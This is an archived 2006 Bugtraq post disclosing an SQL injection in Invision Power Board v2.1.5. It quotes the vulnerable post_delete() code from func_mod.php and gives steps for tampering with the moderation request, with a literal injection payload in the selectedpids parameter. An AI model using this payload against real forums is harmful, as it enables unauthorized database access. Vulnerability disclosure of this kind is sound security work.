lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060428082150.6328.qmail@securityfocus.com>
Date: 28 Apr 2006 08:21:50 -0000
From: o.y.6@...mail.com
To: bugtraq@...urityfocus.com
Subject: Invision Power Board v2.1.5 Remote SQL Injection


Invision Power Board v2.1.5 Remote SQL Injection

Filename		:- func_mod.php
Functionname	:- post_delete()
Lines			:- 89 To 209

Bug Found By :- Devil-00

	Greetz :-
    		Rock Master ^ Hackers Pal ^ n0m4rcy ^
            		www.securtygurus.net

[Code]

		if ( is_array( $id ) )
		{
			if ( count($id) > 0 )
			{
				$pid = " IN(".implode(",",$id).")";
			}
			else
			{
				return FALSE;
			}
		}
		else
		{
			if ( intval($id) )
			{
				$pid   = "=$id";
			}
			else
			{
				return FALSE;
			}
		}

[/CODE]

When $id = array .. the code don't check it if ( INTVAL )

[CODE]
if ( count($id) > 0 )
			{
				$pid = " IN(".implode(",",$id).")";
			}
[/CODE]

Then We Can Do SQL Injection  Here >>

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );
[/CODE]

And Here >>

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );
[/CODE]

Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :(

Exm. To Exploit

	1- First Add 2 Post
    2- Check It To Delete
    	3- Edit String Query By HTTPLiveHeader

[CODE]
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
[/CODE]



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ